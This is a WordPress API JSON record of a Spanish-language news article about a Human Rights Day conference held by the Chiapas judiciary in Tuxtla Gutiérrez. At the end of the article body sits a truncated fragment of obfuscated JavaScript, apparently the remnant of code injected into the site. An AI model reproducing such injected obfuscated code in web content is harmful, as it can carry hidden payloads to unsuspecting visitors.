{"id":19244,"date":"2024-12-11T15:17:40","date_gmt":"2024-12-11T15:17:40","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=19244"},"modified":"2024-12-11T15:17:41","modified_gmt":"2024-12-11T15:17:41","slug":"realiza-poder-judicial-del-estado-conferencia-en-conmemoracion-del-dia-de-los-derechos-humanos","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=19244","title":{"rendered":"Realiza Poder Judicial del Estado conferencia en conmemoraci\u00f3n del D\u00eda de los Derechos Humanos"},"content":{"rendered":"\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"720\" data-id=\"19245\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/12\/FB_IMG_1733930120785-1024x720.jpg\" alt=\"\" class=\"wp-image-19245\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/12\/FB_IMG_1733930120785-1024x720.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/12\/FB_IMG_1733930120785-300x211.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/12\/FB_IMG_1733930120785-768x540.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/12\/FB_IMG_1733930120785.jpg 1080w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"772\" data-id=\"19246\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/12\/FB_IMG_1733930123209-1024x772.jpg\" alt=\"\" class=\"wp-image-19246\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/12\/FB_IMG_1733930123209-1024x772.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/12\/FB_IMG_1733930123209-300x226.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/12\/FB_IMG_1733930123209-768x579.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/12\/FB_IMG_1733930123209.jpg 1080w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"683\" data-id=\"19247\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/12\/FB_IMG_1733930117958-1024x683.jpg\" alt=\"\" class=\"wp-image-19247\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/12\/FB_IMG_1733930117958-1024x683.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/12\/FB_IMG_1733930117958-300x200.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/12\/FB_IMG_1733930117958-768x512.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/12\/FB_IMG_1733930117958.jpg 1080w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n<\/figure>\n\n\n\n<p>Redacci\u00f3n.<\/p>\n\n\n\n<p>10 de diciembre del 2024. Tuxtla Guti\u00e9rrez En el marco de la conmemoraci\u00f3n del D\u00eda Internacional de los Derechos Humanos, se llev\u00f3 a cabo una conferencia magistral sobre la importancia de la protecci\u00f3n y promoci\u00f3n de los derechos fundamentales en el contexto actual, evento que fue encabezado por el magistrado presidente del Tribunal Superior de Justicia y del Consejo de la Judicatura del Estado, Juan Carlos Moreno Guill\u00e9n.<\/p>\n\n\n\n<p>La conferencia fue impartida por la investigadora por M\u00e9xico de Conacyt, Ivonne \u00c1lvarez Guti\u00e9rrez, quien destac\u00f3 los principales avances en las legislaciones internacionales y locales, gracias al impacto que ha tenido la Declaraci\u00f3n Universal de los Derechos Humanos, a 76 a\u00f1os de su publicaci\u00f3n, misma que sigue siendo gu\u00eda esencial para continuar con los retos que se enfrentan en la actualidad global y nacional, por un mundo m\u00e1s justo.<\/p>\n\n\n\n<p>Por su parte, el magistrado presidente, se congratul\u00f3 por la oportunidad de realizar esta ponencia en la casa de la justicia, ya que alguna vez tuvo la oportunidad de desempe\u00f1arse como Ombudsperson del estado y trabajar este tema en varias regiones del pa\u00eds, por lo que hizo hincapi\u00e9 en la relevancia de conmemorar el D\u00eda Internacional de los Derechos Humanos en este Tribunal, pues el Poder Judicial juega un papel fundamental en la protecci\u00f3n de los mismos.<\/p>\n\n\n\n<p>Asegur\u00f3 que todas las personas deben acceder a la justicia de manera equitativa y sin discriminaci\u00f3n, por lo que es imperante que la sociedad, pero en especial las servidoras y servidores del pueblo de los \u00f3rganos jurisdiccionales y administrativos, abonen a esta labor, trabajando con respeto y humanismo para romper con los paradigmas del pasado.<\/p>\n\n\n\n<p>Finalmente, Moreno Guill\u00e9n expres\u00f3 el compromiso para que se genere un trato humanista e igualitario con las personas usuarias, que comience desde el interior del Poder Judicial, y agradeci\u00f3 la informaci\u00f3n compartida por la investigadora por M\u00e9xico de Conacyt, ya que ofrecen una motivaci\u00f3n para continuar, \u201ctengo fe en que con el trabajo conjunto, las cosas van a cambiar y que volveremos a ser el Chiapas seguro que una vez fuimos\u201d, a\u00f1adi\u00f3.<\/p>\n\n\n\n<p>El evento cont\u00f3 con la presencia del investigador C\u00e9sar Astudillo Reyes, as\u00ed como de las y los consejeros de la Judicatura, magistradas, magistrados, juezas y jueces y titulares de diversas \u00e1reas del palacio de justicia en Tuxtla Guti\u00e9rrez.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Redacci\u00f3n. 10 de diciembre del 2024. Tuxtla Guti\u00e9rrez En el marco de la conmemoraci\u00f3n del D\u00eda Internacional de los Derechos Humanos, se llev\u00f3 a cabo una conferencia magistral sobre la importancia de la protecci\u00f3n y promoci\u00f3n de los derechos fundamentales en el contexto actual, evento que fue encabezado por el magistrado presidente del Tribunal Superior &hellip;<\/p>\n","protected":false},"author":2,"featured_media":19245,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-19244","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/19244","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=19244"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/19244\/revisions"}],"predecessor-version":[{"id":19248,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/19244\/revisions\/19248"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/19245"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=19244"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=19244"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=19244"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}